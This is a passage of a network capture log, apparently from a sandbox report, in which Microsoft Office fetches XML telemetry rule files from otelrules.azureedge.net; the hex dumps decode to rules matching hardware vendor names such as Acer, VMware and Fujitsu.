                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                x-ms-request-id: eb1ded04-b01e-0097-298c-3a4f33000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155406Z-174c587ffdfdwxdvhC1TEB1c4n000000035g0000000012a1
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:06 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                31192.168.2.44985013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:06 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:06 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 407
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                x-ms-request-id: 5b0f4dfe-c01e-00a1-3715-3d7e4a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155406Z-178bfbc474bvjk8shC1NYC83ns00000004kg0000000053ty
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:06 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                32192.168.2.44985813.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:08 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:08 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                x-ms-request-id: 7fd471a5-f01e-00aa-27bf-3b8521000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155408Z-15b8b599d88wk8w4hC1TEB14b8000000035g00000000axvu
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:08 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                33192.168.2.44985713.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:08 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:08 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 469
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                x-ms-request-id: 000c37a0-d01e-002b-0920-3d25fb000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155408Z-178bfbc474btvfdfhC1NYCa2en00000004sg000000008tz4
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:08 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                34192.168.2.44985913.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:08 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:08 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 477
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                x-ms-request-id: 3c827ba2-d01e-0014-367c-3bed58000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155408Z-178bfbc474b9fdhphC1NYCac0n00000004hg00000000fmb5
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:08 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                35192.168.2.44986013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:08 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:08 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 464
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                x-ms-request-id: d05e48d4-001e-0065-1c06-3d0b73000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155408Z-178bfbc474bv587zhC1NYCny5w00000004mg000000004pxp
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:08 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                36192.168.2.44986113.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:08 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:08 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 494
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                x-ms-request-id: 44e9982d-301e-001f-6639-3caa3a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155408Z-15b8b599d88wk8w4hC1TEB14b80000000380000000003yvs
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:09 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                37192.168.2.44986613.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:10 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:10 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                x-ms-request-id: 5931471e-001e-0046-7a23-3dda4b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155410Z-178bfbc474bnwsh4hC1NYC2ubs00000004p000000000gxuw
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:10 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                38192.168.2.44986713.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:10 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:10 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                x-ms-request-id: 798eb064-701e-0021-422e-3c3d45000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155410Z-178bfbc474bgvl54hC1NYCsfuw00000004pg000000008swe
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:11 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                39192.168.2.44986813.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:10 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:10 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 404
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                x-ms-request-id: 90548f26-b01e-0021-643a-3ccab7000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155410Z-178bfbc474bbcwv4hC1NYCypys00000004fg00000000ds5e
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:11 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                40192.168.2.44986913.107.246.63443
